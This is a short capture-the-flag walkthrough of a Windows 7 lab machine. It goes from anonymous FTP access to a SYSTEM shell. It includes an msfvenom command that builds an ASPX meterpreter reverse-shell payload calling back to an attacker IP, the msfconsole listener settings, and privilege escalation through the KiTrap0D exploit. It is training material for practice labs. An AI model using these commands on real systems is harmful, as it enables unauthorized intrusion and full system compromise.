We start as usual with our nmap-scan
nmap -sC sV -p- 10.10.10.5
We found FTP with enabled anonymous login, lets use this for us.
Download all files from the FTP to our current directoy
There are only the FIles from the web server. After a test if you can write on the FTP with MSFVENOM create a payload for a reverse shell and wait with msfconsole for the connection.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.36 LPORT=4444 -f aspx >reverse.aspx
Upload the shell to the ftp-server and run msf to start a meterpreter session
set payload windows/meterpreter/reverse_tcp
set LHOST tun0
Call the created shell over the browser.
And here it is, we have a shell. Now we can collect some system information.
The mashine runs a old Windows 7 build, after some research a I found the exploit KiTrap0D.
Throw our meterpreter session into the background and then setup the exploit and connect to the system.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
There is also a way to do it with netcat and push an exploit manualy with a python http-server. I felt both ways equally fast and not very different in complexity.
The flags are always on the desktops of the users.